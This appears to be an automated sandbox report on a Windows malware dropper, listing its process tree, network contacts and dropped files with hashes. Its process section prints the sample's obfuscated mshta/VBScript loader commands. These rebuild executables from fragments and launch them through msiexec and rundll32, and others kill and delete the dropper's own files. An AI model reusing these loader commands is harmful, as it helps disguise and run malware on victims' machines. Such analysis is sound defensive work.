"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 920

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Sat06f5ed0e3bb24.exe" /F

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5"" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1500 -ip 1500

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 928

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Sat0663b341399ee.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 956

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE ( CREAteobjEcT ( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " , 0 ,True ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1500 -ip 1500

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 988

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 +FDKD47Ef.I1+ U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1016

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1500 -ip 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1140

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat0675f75df01bdb.exe" /f

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 gazrxlog.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 whealclothing.xyz udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 my-all-group.bar udp
US 8.8.8.8:53 m525-blockchain31432.bar udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
N/A 127.0.0.1:60748 tcp
N/A 127.0.0.1:60750 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe

MD5 a979670adefae9ab376382f3229f3f28
SHA1 5b5b75a789e46a2f8ac02fba3d895fa968387c9b
SHA256 a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040
SHA512 f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2684-46-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2684-60-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3752-61-0x0000000073BCE000-0x0000000073BCF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe

MD5 dd2fdd69b9db1cf5764dcfd429a1cf5e
SHA1 c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8
SHA256 d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe
SHA512 c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d

memory/4612-73-0x0000000004C60000-0x0000000005288000-memory.dmp

memory/4612-72-0x0000000073BC0000-0x0000000074370000-memory.dmp

memory/4612-71-0x0000000004590000-0x00000000045C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe

MD5 1cc8a64b178076dca421fedc3a248a56
SHA1 db8ed444965577dfb6db4f92ddd8d96a157ddea5
SHA256 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345
SHA512 c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe

MD5 e9133ca1a95483a3331d0f336685302d
SHA1 48c1348e20b26be8227ed63a1db0f13716f1b8e3
SHA256 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b
SHA512 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe

MD5 854ea0bc0602795b95da3be8257c530f
SHA1 f243a71edc902ed91d0f990630a73d0d01828c73
SHA256 c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e
SHA512 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe

MD5 0e05650d436fd4d92775cd4f65973870
SHA1 4d13aaa6b18630d0c89400cee5933130f03bd762
SHA256 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16
SHA512 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe

MD5 29c9683aa48f1e3a29168f6b0ff3be04
SHA1 f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f
SHA256 e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901
SHA512 a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe

MD5 10e13cc7b41d162ab578256f27d297b1
SHA1 1d938b7e6e99951d9b8139f078483539120021e6
SHA256 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9
SHA512 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

memory/2684-59-0x0000000064941000-0x000000006494F000-memory.dmp

memory/2684-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-57-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2684-56-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2684-55-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2684-50-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2684-49-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2684-47-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/4244-83-0x00000000002B0000-0x00000000002CA000-memory.dmp

memory/4612-87-0x00000000052D0000-0x00000000052F2000-memory.dmp

memory/8-90-0x0000000000710000-0x0000000000778000-memory.dmp

memory/4612-100-0x0000000005550000-0x00000000058A4000-memory.dmp

memory/4612-89-0x00000000054E0000-0x0000000005546000-memory.dmp

memory/8-111-0x0000000002A00000-0x0000000002A1E000-memory.dmp

memory/8-106-0x0000000005070000-0x00000000050E6000-memory.dmp

memory/4612-88-0x0000000005470000-0x00000000054D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_htflkwkw.ify.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4244-86-0x0000000002320000-0x0000000002326000-memory.dmp

memory/8-112-0x0000000005810000-0x0000000005DB4000-memory.dmp

memory/3752-113-0x00000000065D0000-0x00000000065EE000-memory.dmp

memory/3752-114-0x0000000006AB0000-0x0000000006AFC000-memory.dmp

memory/2684-122-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3076-126-0x0000000000400000-0x0000000000883000-memory.dmp

memory/2684-125-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2684-124-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2684-123-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2684-120-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2684-116-0x0000000000400000-0x000000000051B000-memory.dmp

memory/3752-129-0x0000000006BA0000-0x0000000006BD2000-memory.dmp

memory/3752-130-0x000000006E870000-0x000000006E8BC000-memory.dmp

memory/3752-140-0x0000000006B80000-0x0000000006B9E000-memory.dmp

memory/3752-144-0x00000000077C0000-0x0000000007863000-memory.dmp

memory/4612-145-0x000000006E870000-0x000000006E8BC000-memory.dmp

memory/4612-159-0x0000000006BD0000-0x0000000006BEA000-memory.dmp

memory/3752-161-0x0000000007F40000-0x00000000085BA000-memory.dmp

memory/4612-163-0x0000000006F10000-0x0000000006F1A000-memory.dmp

memory/4612-164-0x0000000007100000-0x0000000007196000-memory.dmp

memory/4612-165-0x0000000007090000-0x00000000070A1000-memory.dmp

memory/4612-166-0x00000000070C0000-0x00000000070CE000-memory.dmp

memory/3752-167-0x0000000007B40000-0x0000000007B54000-memory.dmp

memory/3752-188-0x0000000007C30000-0x0000000007C4A000-memory.dmp

memory/3752-189-0x0000000007C20000-0x0000000007C28000-memory.dmp

memory/4612-195-0x0000000073BC0000-0x0000000074370000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Temp\IiKZCUV.MQ

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\6h87pfZ.4

MD5 243a3d5a63c4d0f3a18a3d340f50ed8d
SHA1 4b5d7d91fdc7666d131ef4ed7524bdc1b024a009
SHA256 4da1a700d1dd30fa025a3682aa490680099d508a0b64fbdf8bac2f92914628a1
SHA512 64cd601f218c7ace06dd62ad41faf58d829b77f221fa444d2e347f52fa03210584f75448416e4910a0bb2058aafb8aaadcc9e9ea5c353cb29c352c23c6532ab1

C:\Users\Admin\AppData\Local\Temp\jB946RB.I7A

MD5 d4c89c7cabd256ccedd701e27b3fc31a
SHA1 c01e95b983215b9a08c807084185dbd17ccd32aa
SHA256 e7fe376512c6ba9b615d492961ef38a27b14d192b7c9751b75d9004370b5266c
SHA512 1d3d59c17368f3e264241fc5100971b74487d0bdc0e7902081a332314fdc59e07475f1aaeed17cd2bc1f64c59378ebe1b76e83ea046351d6691c647a60cbb421

C:\Users\Admin\AppData\Local\Temp\r6f7sE.I

MD5 bd3523387b577979a0d86ff911f97f8b
SHA1 1f90298142a27ec55118317ee63609664bcecb45
SHA256 a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36
SHA512 b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286

C:\Users\Admin\AppData\Local\Temp\XHnbBPN.0kM

MD5 008132f08399ae8927e41d1ea88ffe74
SHA1 c7d2551b905d578779533418e7a394fd94f17903
SHA256 439a6346ae58af4ce7d863d18b70b98e5628ea0f81cd740dd3b886fbe3a7246a
SHA512 36a05a28325fc92017f6c44e7a6d88abe15a935aef61aa0047926efdb1ec8d3359fdb9e02d4602d4738ad25503e0dbe66f26d45bbea7f10d219aaa015c210d4e

C:\Users\Admin\AppData\Local\Temp\BtDIj1.fYl

MD5 d17564f93bb4a4cf11c46726ea1fe74b
SHA1 84cbff97ff148296bf36898dcf640ad18eb317c9
SHA256 96a4ccf3bc2092c2198cad0beb6a6fdc26db7f59bb82bf4e476bbac6fc783ce0
SHA512 f327cac0e017ebdaa87e1a8ed40d3abfa5a7614250a9759d6ae62f0f7149aa8ee4a26bb74854ef3860ae8911d87b55803d1f4c0fd58d19507ac4b91eebbb48ff

C:\Users\Admin\AppData\Local\Temp\Q_tW.pL

MD5 40ba2d6fcce0565f8d90055a8fb9975b
SHA1 c7529fea938658e19d238200af795533cba13c5c
SHA256 df403d434bdcc3b3604349310c62ca68718f1388a3d9c6155e026ff685b555b6
